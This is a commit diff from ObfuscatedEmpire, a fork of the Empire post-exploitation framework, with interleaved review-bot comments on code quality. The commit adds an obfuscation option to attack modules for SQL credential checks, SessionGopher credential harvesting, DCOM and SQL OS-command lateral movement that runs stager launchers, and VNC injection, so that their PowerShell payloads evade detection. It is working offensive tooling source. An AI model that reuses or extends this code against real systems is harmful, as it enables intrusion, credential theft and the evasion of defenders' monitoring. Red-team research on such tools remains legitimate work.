Merge branch '2.0_beta' of https://github.com/cobbr/ObfuscatedEmpire into 2.0_beta

mdns
cobbr 2017-06-19 22:35:34 -05:00
commit c691830ddd
13 changed files with 137 additions and 75 deletions


@ -55,7 +55,7 @@ class Module:
self.options[option]['Value'] = value
def generate(self):
def generate(self, obfuscate=False, obfuscationCommand=""):
# read in the common module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/collection/Get-IndexedItem.ps1"
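Review bot: `generate` gains `obfuscate` and `obfuscationCommand` without a docstring, and none of the visible lines in this section reads either parameter. The body continues outside the hunk, so whether they are used further down cannot be confirmed from here. I would add a short docstring stating what the method returns and what the two parameters control, and say so explicitly if this module ignores them. The same missing docstring applies to every `generate` signature changed in this commit.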


@ -67,7 +67,7 @@ class Module:
if option in self.options:
self.options[option]['Value'] = value
def generate(self):
def generate(self, obfuscate=False, obfuscationCommand=""):
username = self.options['Username']['Value']
password = self.options['Password']['Value']
@ -78,34 +78,42 @@ class Module:
# read in the common module source code
moduleSource = self.mainMenu.installPath + "data/module_source/collection/Get-SQLColumnSampleData.ps1"
script = ""
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
script = moduleSource.replace("module_source", "obfuscated_module_source")
try:
with open(moduleSource, 'r') as source:
script = source.read()
f = open(moduleSource, 'r')
except:
print helpers.color("[!] Could not read module source path at: " + str(moduleSource))
return ""
if check_all:
auxModuleSource = self.mainMenu.installPath + "data/module_source/situational_awareness/network/Get-SQLInstanceDomain.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=auxModuleSource, obfuscationCommand=obfuscationCommand)
auxModuleSource = moduleSource.replace("module_source", "obfuscated_module_source")
try:
with open(auxModuleSource, 'r') as auxSource:
auxScript = auxSource.read()
script += " " + auxScript
except:
print helpers.color("[!] Could not read additional module source path at: " + str(auxModuleSource))
script += " Get-SQLInstanceDomain "
scriptEnd = " Get-SQLInstanceDomain "
if username != "":
script += " -Username "+username
scriptEnd += " -Username "+username
if password != "":
script += " -Password "+password
script += " | "
script += " Get-SQLColumnSampleData"
scriptEnd += " -Password "+password
scriptEnd += " | "
scriptEnd += " Get-SQLColumnSampleData"
if username != "":
script += " -Username "+username
scriptEnd += " -Username "+username
if password != "":
script += " -Password "+password
scriptEnd += " -Password "+password
if instance != "" and not check_all:
script += " -Instance "+instance
scriptEnd += " -Instance "+instance
if no_defaults:
script += " -NoDefaults "
scriptEnd += " -NoDefaults "
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script
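Review bot: The module source read in this section is guarded by a bare `except:`, and the line `f = open(moduleSource, 'r')` comes after the `with` block has already read the file. If that line is on the new side (the page has lost its +/- markers), it opens a handle that is never read or closed. I would delete it and narrow the handler to `except IOError:` so that an unrelated error is not reported as an unreadable path. The same bare `except:` guards the `auxModuleSource` read a few lines further down.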


@ -60,7 +60,7 @@ class Module:
if option in self.options:
self.options[option]['Value'] = value
def generate(self):
def generate(self, obfuscate=False, obfuscationCommand=""):
username = self.options['Username']['Value']
password = self.options['Password']['Value']
@ -70,6 +70,9 @@ class Module:
# read in the common module source code
moduleSource = self.mainMenu.installPath + "data/module_source/collection/Get-SQLQuery.ps1"
script = ""
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
try:
with open(moduleSource, 'r') as source:
script = source.read()
@ -77,13 +80,15 @@ class Module:
print helpers.color("[!] Could not read module source path at: " + str(moduleSource))
return ""
script += " Get-SQLQuery"
scriptEnd = " Get-SQLQuery"
if username != "":
script += " -Username "+username
scriptEnd += " -Username "+username
if password != "":
script += " -Password "+password
scriptEnd += " -Password "+password
if instance != "":
script += " -Instance "+instance
script += " -Query "+"\'"+query+"\'"
scriptEnd += " -Instance "+instance
scriptEnd += " -Query "+"\'"+query+"\'"
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script
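Review bot: `scriptEnd += " -Query "+"\'"+query+"\'"` wraps the option value in single quotes without escaping quotes inside it, so a query containing `'` ends the PowerShell string early and the remainder is parsed as command text. Doubling embedded quotes first, `query.replace("'", "''")`, keeps the value a single literal. The `-Username`, `-Password` and `-Instance` values in this section are appended with no quoting at all, so a value containing a space or `;` is split the same way. The unquoted pattern recurs in the other SQL modules touched by this commit.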


@ -105,12 +105,15 @@ class Module:
self.options[option]['Value'] = value
def generate(self):
def generate(self, obfuscate=False, obfuscationCommand=""):
# if you're reading in a large, external script that might be updates,
# use the pattern below
# read in the common module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/credentials/Invoke-SessionGopher.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
@ -121,7 +124,7 @@ class Module:
f.close()
script = moduleCode
script += "Invoke-SessionGopher"
scriptEnd = "Invoke-SessionGopher"
# add any arguments to the end execution of the script
for option,values in self.options.iteritems():
@ -129,8 +132,10 @@ class Module:
if values['Value'] and values['Value'] != '':
if values['Value'].lower() == "true":
# if we're just adding a switch
script += " -" + str(option)
scriptEnd += " -" + str(option)
else:
script += " -" + str(option) + " " + str(values['Value'])
scriptEnd += " -" + str(option) + " " + str(values['Value'])
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script
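Review bot: The three-line `if obfuscate:` preamble (call `helpers.obfuscate_module`, then rewrite `moduleSource`) and the three-line tail (`helpers.obfuscate` on `scriptEnd`, then `script += scriptEnd`) are pasted verbatim into each module this commit touches. Hand-copied blocks like these are hard to keep identical across files. I would move the preamble into one shared helper that takes the path and the two parameters and returns the path to read, so each call site becomes one line such as `moduleSource = helpers.<PLACEHOLDER_HELPER>(moduleSource, obfuscate, obfuscationCommand)`; the name is a placeholder, since no such helper is visible on this page. The `try` around `open` in this section is cut by the hunk boundary, so its handler cannot be reviewed here.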


@ -83,7 +83,7 @@ class Module:
self.options[option]['Value'] = value
def generate(self):
def generate(self, obfuscate=False, obfuscationCommand=""):
listenerName = self.options['Listener']['Value']
method = self.options['Method']['Value']
@ -93,7 +93,9 @@ class Module:
proxyCreds = self.options['ProxyCreds']['Value']
moduleSource = self.mainMenu.installPath + "/data/module_source/lateral_movement/Invoke-DCOM.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
@ -124,9 +126,11 @@ class Module:
else:
stagerCmd = '%COMSPEC% /C start /b C:\\Windows\\System32\\WindowsPowershell\\v1.0\\' + launcher
script += "Invoke-DCOM -ComputerName %s -Method %s -Command '%s'" % (computerName, method, stagerCmd)
scriptEnd = "Invoke-DCOM -ComputerName %s -Method %s -Command '%s'" % (computerName, method, stagerCmd)
script += "| Out-String | %{$_ + \"`n\"};"
scriptEnd += "| Out-String | %{$_ + \"`n\"};"
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script


@ -74,7 +74,7 @@ class Module:
option, value = param
if option in self.options:
self.options[option]['Value'] = value
def generate(self):
def generate(self, obfuscate=False, obfuscationCommand=""):
credID = self.options["CredID"]['Value']
if credID != "":
@ -101,6 +101,9 @@ class Module:
moduleSource = self.mainMenu.installPath + "data/module_source/lateral_movement/Invoke-SQLOSCmd.ps1"
moduleCode = ""
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
try:
with open(moduleSource, 'r') as source:
moduleCode = source.read()
@ -122,10 +125,13 @@ class Module:
command = 'C:\\Windows\\System32\\WindowsPowershell\\v1.0\\' + launcher
script += "Invoke-SQLOSCmd -Instance \"%s\" -Command \"%s\"" % (instance, command)
scriptEnd = "Invoke-SQLOSCmd -Instance \"%s\" -Command \"%s\"" % (instance, command)
if username != "":
script += " -UserName "+username
scriptEnd += " -UserName "+username
if password != "":
script += " -Password "+password
scriptEnd += " -Password "+password
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script
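Review bot: `scriptEnd += " -Password "+password` writes the credential verbatim into the generated script text, and nothing near the line documents that. Anything that records the script will capture the cleartext value, whether operator-side logs or PowerShell script block logging on the host where it runs. Whether `helpers.obfuscate` changes that cannot be seen on this page. I would add a comment above the line, `# NOTE: credential is embedded in cleartext in the generated script`. The same applies to the `-Password` lines in the other SQL modules in this commit.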


@ -71,13 +71,15 @@ class Module:
self.options[option]['Value'] = value
def generate(self):
def generate(self, obfuscate=False, obfuscationCommand=""):
moduleName = self.info["Name"]
# read in th Invoke-Vnc.ps1 module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/management/Invoke-Vnc.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
@ -89,14 +91,17 @@ class Module:
script = moduleCode
script += "\nInvoke-Vnc"
scriptEnd = "\nInvoke-Vnc"
for option,values in self.options.iteritems():
if option.lower() != "agent":
if values['Value'] and values['Value'] != '':
if values['Value'].lower() == "true":
# if we're just adding a switch
script += " -" + str(option)
scriptEnd += " -" + str(option)
else:
script += " -" + str(option) + " " + str(values['Value'])
scriptEnd += " -" + str(option) + " " + str(values['Value'])
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script


@ -62,7 +62,7 @@ class Module:
if option in self.options:
self.options[option]['Value'] = value
def generate(self):
def generate(self, obfuscate=False, obfuscationCommand=""):
username = self.options['Username']['Value']
password = self.options['Password']['Value']
instance = self.options['Instance']['Value']
@ -71,6 +71,9 @@ class Module:
# read in the common module source code
moduleSource = self.mainMenu.installPath + "data/module_source/recon/Get-SQLServerLoginDefaultPw.ps1"
script = ""
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
try:
with open(moduleSource, 'r') as source:
script = source.read()
@ -80,19 +83,25 @@ class Module:
if check_all:
auxModuleSource = self.mainMenu.installPath + "data/module_source/situational_awareness/network/Get-SQLInstanceDomain.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=auxModuleSource, obfuscationCommand=obfuscationCommand)
auxModuleSource = moduleSource.replace("module_source", "obfuscated_module_source")
try:
with open(auxModuleSource, 'r') as auxSource:
auxScript = auxSource.read()
script += " " + auxScript
except:
print helpers.color("[!] Could not read additional module source path at: " + str(auxModuleSource))
script += " Get-SQLInstanceDomain "
scriptEnd = " Get-SQLInstanceDomain "
if username != "":
script += " -Username "+username
scriptEnd += " -Username "+username
if password != "":
script += " -Password "+password
script += " | Select Instance | "
script += " Get-SQLServerLoginDefaultPw"
scriptEnd += " -Password "+password
scriptEnd += " | Select Instance | "
scriptEnd += " Get-SQLServerLoginDefaultPw"
if instance != "" and not check_all:
script += " -Instance "+instance
scriptEnd += " -Instance "+instance
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script
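Review bot: When the `auxModuleSource` read fails, the handler only prints a warning and execution continues, so `scriptEnd` still begins with ` Get-SQLInstanceDomain ` although that function's source was never appended to `script`. The handler for the main read in the Get-SQLColumnSampleData section returns `""` on failure; the aux handler should do the same with `return ""` after the `print`, and should catch `IOError` rather than use a bare `except:`. The same fall-through appears in the Get-SQLColumnSampleData and Get-SQLServerInfo sections. These handler lines may be unchanged context, since the page has lost its +/- markers.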


@ -78,7 +78,7 @@ class Module:
self.options[option]['Value'] = value
def generate(self):
def generate(self, obfuscate=False, obfuscationCommand=""):
# the PowerShell script itself, with the command to invoke
# for execution appended to the end. Scripts should output
@ -91,6 +91,9 @@ class Module:
# use the pattern below
# read in the common module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/situational_awareness/host/Start-MonitorTCPConnections.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
@ -101,7 +104,7 @@ class Module:
f.close()
script = moduleCode
script += "Start-TCPMonitor"
scriptEnd = "Start-TCPMonitor"
# add any arguments to the end execution of the script
for option,values in self.options.iteritems():
@ -109,8 +112,10 @@ class Module:
if values['Value'] and values['Value'] != '':
if values['Value'].lower() == "true":
# if we're just adding a switch
script += " -" + str(option)
scriptEnd += " -" + str(option)
else:
script += " -" + str(option) + " " + str(values['Value'])
scriptEnd += " -" + str(option) + " " + str(values['Value'])
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script


@ -79,7 +79,7 @@ class Module:
if option in self.options:
self.options[option]['Value'] = value
def generate(self):
def generate(self, obfuscate=False, obfuscationCommand=""):
domainController = self.options['DomainController']['Value']
computerName = self.options['ComputerName']['Value']
@ -92,6 +92,9 @@ class Module:
# read in the common module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/situational_awareness/network/Get-SQLInstanceDomain.ps1"
script = ""
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
try:
with open(moduleSource, 'r') as source:
script = source.read()
@ -99,20 +102,22 @@ class Module:
print helpers.color("[!] Could not read module source path at: " + str(moduleSource))
return ""
script += " Get-SQLInstanceDomain"
scriptEnd = " Get-SQLInstanceDomain"
if username != "":
script += " -Username " + username
scriptEnd += " -Username " + username
if password != "":
script += " -Password " + password
scriptEnd += " -Password " + password
if domainController != "":
script += " -DomainController "+domainController
scriptEnd += " -DomainController "+domainController
if computerName != "":
script += " -ComputerName "+computerName
scriptEnd += " -ComputerName "+computerName
if domainAccount != "":
script += " -DomainAccount "+domainAccount
scriptEnd += " -DomainAccount "+domainAccount
if checkMgmt.lower() != "false":
script += " -CheckMgmt"
scriptEnd += " -CheckMgmt"
if udpTimeOut != "":
script += " -UDPTimeOut "+udpTimeOut
scriptEnd += " -UDPTimeOut "+udpTimeOut
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script


@ -60,7 +60,7 @@ class Module:
if option in self.options:
self.options[option]['Value'] = value
def generate(self):
def generate(self, obfuscate=False, obfuscationCommand=""):
username = self.options['Username']['Value']
password = self.options['Password']['Value']
instance = self.options['Instance']['Value']
@ -69,6 +69,9 @@ class Module:
# read in the common module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/situational_awareness/network/Get-SQLServerInfo.ps1"
script = ""
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
try:
with open(moduleSource, 'r') as source:
script = source.read()
@ -78,24 +81,29 @@ class Module:
if check_all:
auxModuleSource = self.mainMenu.installPath + "data/module_source/situational_awareness/network/Get-SQLInstanceDomain.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=auxModuleSource, obfuscationCommand=obfuscationCommand)
auxModuleSource = moduleSource.replace("module_source", "obfuscated_module_source")
try:
with open(auxModuleSource, 'r') as auxSource:
auxScript = auxSource.read()
script += " " + auxScript
except:
print helpers.color("[!] Could not read additional module source path at: " + str(auxModuleSource))
script += " Get-SQLInstanceDomain "
scriptEnd = " Get-SQLInstanceDomain "
if username != "":
script += " -Username "+username
scriptEnd += " -Username "+username
if password != "":
script += " -Password "+password
script += " | "
script += " Get-SQLServerInfo"
scriptEnd += " -Password "+password
scriptEnd += " | "
scriptEnd += " Get-SQLServerInfo"
if username != "":
script += " -Username "+username
scriptEnd += " -Username "+username
if password != "":
script += " -Password "+password
scriptEnd += " -Password "+password
if instance != "" and not check_all:
script += " -Instance "+instance
scriptEnd += " -Instance "+instance
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script


@ -56,7 +56,7 @@ class Module:
self.options[option]['Value'] = value
def generate(self):
def generate(self, obfuscate=False, obfuscationCommand=""):
script = """
Function Get-Schwifty
@ -98,5 +98,6 @@ Function Get-Schwifty
script += " -" + str(option) + " " + str(values['Value'])
script += "; 'Agent is getting schwifty!'"
if obfuscate:
script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand)
return script


@ -65,7 +65,7 @@ class Module:
self.options[option]['Value'] = value
def generate(self):
def generate(self, obfuscate=False, obfuscationCommand=""):
script = """
function Invoke-Wlrmdr {
@ -107,5 +107,6 @@ Invoke-Wlrmdr"""
script += " -" + str(option)
else:
script += " -" + str(option) + " \"" + str(values['Value'].strip("\"")) + "\""
if obfuscate:
script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand)
return script